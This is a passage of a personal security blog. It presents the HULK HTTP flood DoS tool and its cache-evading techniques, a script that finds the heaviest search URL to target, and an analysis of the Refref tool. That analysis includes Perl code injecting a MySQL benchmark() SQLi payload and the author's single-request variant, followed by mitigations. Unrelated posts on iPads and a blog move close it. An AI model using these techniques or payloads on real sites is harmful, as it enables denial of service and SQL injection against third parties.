HULK, Web Server DoS Tool

Introducing HULK (Http Unbearable Load King).1-twitter-dos-data

In my line of work, I get to see tons of different nifty hacking tools, and traffic generation tools that are meant to either break and steal information off a system, or exhaust its resource pool, rendering the service dead and putting the system under a denial of service.

For a while now, I have been playing with some of the more exotic tools, finding that their main problem is always the same… they create repeatable patterns. too easy to predict the next request that is coming, and therefor mitigate. Some, although elegant, lack the horsepower to really put a system on its knees.

For research purposes, I decided to take some of the lessons I’ve learned over time and practice what I preach.

Enforcing Python’s engines, I wrote a script that generates some nicely crafted unique Http requests, one after the other, generating a fair load on a webserver, eventually exhausting it of resources. this can be optimized much much further, but as a proof of concept and generic guidance it does its job.

As a guideline, the main concept of HULK, is to generate Unique requests for each and every request generated, thus avoiding/bypassing caching engines and effecting directly on the server’s load itself.

I have published it to Packet Storm, as we do.

Some Techniques

  • Obfuscation of Source Client – this is done by using a list of known User Agents, and for every request that is constructed, the User Agent is a random value out of the known list
  • Reference Forgery – the referer that points at the request is obfuscated and points into either the host itself or some major prelisted websites.
  • Stickiness – using some standard Http command to try and ask the server to maintain open connections by using Keep-Alive with variable time window
  • no-cache – this is a given, but by asking the HTTP server for no-cache , a server that is not behind a dedicated caching service will present a unique page.
  • Unique Transformation of URL – to eliminate caching and other optimization tools, I crafted custom parameter names and values and they are randomized and attached to each request, rendering it to be Unique, causing the server to process the response on each event.


Basically my test web server with 4gb of Ram running Microsoft IIS7 was brought to its knees under less than a minute, running all requests from a single host.

In the pictures below you can see the tool in action, where it first ( #1 ) executed against a URL, and then the tool starts generating a load of unique requests and sending over the target server ( host of the URL ), and second ( #2 ) we can see that the server at some point starts failing to respond since it has exhausted its resource pool.


Note the “safe” word is meant to kill the process after all threads got a 500 error, since its easier to control in a lab, it is optional.


File : ( via Packetstorm )

The tool is meant for educational purposes only, and should not be used for malicious activity of any kind.


[ Edit 25nov2012 : changed download link to packetstorm ]

Finding the best Web DoS Attack Url


To establish common ground, I would like to start by explaining some theory behind DoS attacks on the HTTP attack vector.

An HTTP DoS attack is usually not based on a vulnerability or known flaw in a web server or a service, instead – its the attempt to bring a server down by using all of its available resources and its service pool. That being said, the common HTTP DoS tools usually operate by generating massive amounts of requests to a specific set of URLs on a website in order to choke the resource pool and denying the service.

One very important element in the process, is locating the “Perfect URL”, which is the URL that causes the most load on the server when requested, requiring the server to process as much data as possible before presenting the output to the client. and because of that, the best vector is always to go for the website’s search engine, since that will always require some computation power.


What i came to realize is that a simple engine can be written, to run a dictionary against a search engine, and by observing the amount of results presented back from the website for each keyword, one can determine using an automated tool – which is the best search term to create the most load on the server, and build the DoS URL based on that.

Ready, Get Set,  Go!

Lets break the idea into what we want to achieve. we want to run multiple requests to a web server on the search URL. Then, we want to run dictionary as the search term, and by parsing the response page for the place where the number of results is returned – to find the phrase that returns most results (max) and crown it as the “Perfect URL” for a DoS attack.

Using Python, I wrote such a tool that gets as input : search url, regex for finding the number of results and a dictionary file, and does what i wrote above, multithreaded of course ).

Usage looks something like :

python 'results\s\:\s(\d+)' wordlist.txt

The tool then opens several threads, each asking for a word out of the dictionary, and adds it to the search string. It then looks for the Regular Expression in the result page and grabs the number of results. Finally, it shows as output, the best URL that produced the highest number of results so far.

Looks something like this :

python 'results\s\:\s(\d+)' dictionary.txt
-- Loading Dictionary --
-- Loading Complete --
WORD:tree COUNT:13454 URL:
WORD:woman COUNT:110565 URL:
WORD:man COUNT:203721 URL:

As you can see. the result indicated that the word “man” has produced the most search results ( 203721 ) , and therefore the best URL to run an HTTP DoS attack against this site will be 

In a DoS attack scheme, this kind of tool will/should be used as part of the Reconnaissance phase, detecting a good attack URL ( or URLs ) and then running a DoS tool against it.


I am sharing this as an educational tool, designed to only be used in lab environment and not in the wild, its is meant for research purposes only and any malicious usage of this tool is prohibited.

File : ( zip file )

Looking into

I had some time finally to play around with Refref ( originally written for Anonymous ), and i really liked it. for those of you who are unfamiliar with Refref, it is an application denial of service tool, which uses an interesting vector of attack making it very effective. to my knowledge it exists as either a perl script or a javascript flavor in the wild.

the interesting thing about the javascript flavor is the ability to then run it off simple devices such as mobile smartphones or tablets, rendering it more effective for the ease of getting one hacktivist on board with using it without running perl or downloading software.


The way that Refref works, is by exploiting an SQLi in the front end web server, it injects an SQL command that effects an unprotected database server and exhausts if from its resources. as far as i know, it effects only mysql servers, however, they seem to be the majority of the backend db servers for many of todays websites, and least as the most upfront database tier.

the SQL command in use is the benchmark() function in mysql, that basically evaluates input for a number of times. normally that command should not be allowed to be executed by the database user that the application server is using, but in many many cases it remains unhandled and is in fact a vulnerability.

The payload code snippet out of (source can be found here) :

sub now {
  print "\n[+] Target : " . $_[0] . "\n";
  print "\n[+] Starting the attack\n[+] Info: Control+C to stop attack\n\n";

  while(true) {
    $SIG{INT} = \&adios;

    $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");

    unless($code->is_success) {
      print "[+] Web Off\n";

Looking at the payload we could easyly identify the function that is being injected as payload is


So basically, evaluating the Hex term presented, 99999999999 times. converting Hex to Ascii will render the term 0x70726f62616e646f70726f62616e646f70726f62616e646f into “probandoprobandoprobando”, which translates to “testingtestingtesting” in english.

The evaluation CPU time that is required to run the function is what generates the denial of service on the mysql server. When I tested this on a Mysql ( latest community version available today ) has brought my server to its knees in 2-3 seconds, rendering 99-100% CPU utilization and effectively denying it from serving any information to the client. so very very effective.

My Take

although refref in its current form is quite effective, the payload implementation works in a way that old DOS tools usually work which is to knock on the door until it breaks, but im uncertain if that is neccesary in an Application DOS attack, since refref is based on deploying a command to the server and making it busy.

I therefore have altered the payload function to the following form and ran the test again :

sub now {
  print "\n[+] Target : ".$_[0]."\n";
  print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
  $SIG{INT} = \&adios;
  $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
  print "[+] Web Off\n";

All I did here is really just taking the loop out and making it into a single request attack.

The result was the same, the server got to 99-100% utilization on evaluating the request. I guess that the reason to include the original loop is to generate a normal traffic jam, to be added to the payload, but if used in the way that I have, you get to have a nice run-by attack, killing the service with just a single request. My guess is that when author wrote the original tool, he/she/they had either different experience or a larger environment where it mattered.


  • (Frontend) So, my take is that a Web Application Firewall should be able to handle this tool using standard SQL Injection mitigation techniques, since the vector of attack is in fact SQLi to inject the function payload.
  • (Backend) I would suggest hardening the Database by not allowing non-dba users to run the benchmark function, and also harden the user configured on the web front end to not be able to run any database function that is not necessarily for its operation.

The new iPad as a Business Tool

I decided to stop carrying my laptop to business meetings. no use. I got to a point where I feel that I carry a bulky bag full of unneeded  cables adapters and others where the only time I need it is when my clients require my hands-on expertise.

today with the purchase of the new iPad ( 3rd generation ) I completely move away from carrying a laptop, and this is how I am going to fulfill my business needs on the go :

  1. Backoffice email/calendar/notes are all handled by the native software anyway so that’s a fairly easy task
  2. Dropbox holds all documents that I sometimes send clients or require to answer a question, and I can access it from the iPad.
  3. I take Notes in meetings using Evernote, which I then use the desktop client to view when im at my desk working on my pc.
  4. Presentations are completely solved using SlideShark application which converts the PPT/PPTX to their format, then gives me the exact same quality of presentation and animation of powerpoint ( I use apple’s VGA adapter to present )
  5. GoodReader, is my file orchestrator, it connects everywhere ! to my company FTP, to my Dropbox, to my Googledocs, and to my shares when available. I use it to read documents from all sources, keep local copies if needed, and I use it to trigger external readers ( “Open In…” feature, that’s how I open slides in SlideShark )

there is probably more, but for now – that’s my solution to computing on the day-2-day business on the go, without carrying the bulk.

My Old Blog

Today, im moving into, after using Blogger for years as my blog host.

I dont know why i moved exactly, i just wanted a wordpress blog that i can use going forward, and to mark a new path in the way i blog, get back into focus and have a more clear mind.

I decided not to migrate the majority of old posts, maybe just some key ones –  and just keep the old Blog to raise dust. if you want to read some of my old content, please visit

To make it easier for existing subscribers, the RSS Feeds now direct to the new site.

All future writing and publishing, will be here.